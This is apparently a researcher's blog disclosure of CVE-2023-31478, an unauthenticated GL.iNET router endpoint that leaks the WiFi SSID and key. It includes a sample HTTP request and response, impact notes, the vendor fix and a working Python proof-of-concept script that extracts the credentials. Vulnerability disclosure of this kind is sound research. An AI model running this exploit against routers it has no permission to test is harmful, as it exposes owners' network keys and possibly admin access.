CVE-2023-31478: GL.iNET SSID Key Disclosure

#web #security-research #iot

CVE-2023-31478: GL.iNET SSID Key Disclosure

  • CVSS Score - 8.3, High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L)
  • Overview - An API endpoint for all GL.iNET devices reveals information about the WiFi configuration, including SSID and key. This endpoint can be accessed without any sort of authentication (although the 4.x firmware documentation claims authentication is required). Affects versions <= 3.215. Example request and response below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /api/router/mesh/status HTTP/1.1
Host: 192.168.8.1
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 4

mac=

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 143
Connection: close
Date: Thu, 29 Dec 2022 21:51:13 GMT
Server: lighttpd/1.4.48

{"del":"0","led":"1","led_sync":"0","wifi_sync":"0","ssid":"GL-XE300-343","key":"goodlife","encryption":"psk2","version":"3.214","code":0}
  • Description - The endpoint /api/router/mesh/status is not listed in the front-end of the web GUI for all GL.iNET devices
  • Steps to reproduce - run the Proof of Concept in the PoC section below using python3 exploit.py <domain/IP>, such as python3 exploit.py 192.168.8.1. Information will be returned such as {'del': '0', 'led': '1', 'led_sync': '0', 'disabled': '2G', 'wifi_sync': '0', 'ssid': 'GL-XE300-343', 'key': 'goodlife', 'encryption': 'psk2', 'version': '3.215', 'code': 0}
  • Impact
    • Since this exploit isn’t very useful in default configurations for GL.iNET devices, a section on impact is needed. By default (on the device I’ve looked at), firewall rules block anything coming from the WAN side, meaning the only way to access the Web GUI is to already be on the LAN, which means the SSID key is already known.
    • However, this exploit is still relevant in non-standard configurations, such as ones where access to the Web GUI is enabled without having to be on the LAN (such as opening up the WAN firewall). This may allow an attacker to connect to the internal LAN.
    • In addition, the SSID key may be related to (or the same as) the admin password for the Web GUI. In this case, sending a simple request would give you admin access to the router.
    • Note that a search on Shodan gives over 1000 results, which means that (as of January 2023) there are at least 1000 vulnerable GL.iNET routers available from anyone around the world, with many more in other scenarios.

Fix

This was fixed in version 3.216 by removing the /api/router/mesh/status endpoint from the list of unauthenticated endpoints.

PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests, sys
import warnings
warnings.filterwarnings("ignore")


## Get arguments
if (len(sys.argv) < 2):
    print("Usage: python3 exploit.py <domain/IP>")
    sys.exit(1)

url = sys.argv[1]


## Send request
data = "mac="
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
response = requests.request("POST", "https://"+url+"/api/router/mesh/status", verify=False, timeout=4, data=data, headers=headers)


## Check response
try:
    json = response.json()
    if json["code"] == -1:
        print("[-] Machine not vulnerable")
    else:
        print(json)
except:
    print("[-] Machine not vulnerable, error was encountered")

Theme Pure | Powered by Hexo and Cookies I take no responsibility for anything on this site because that's too much work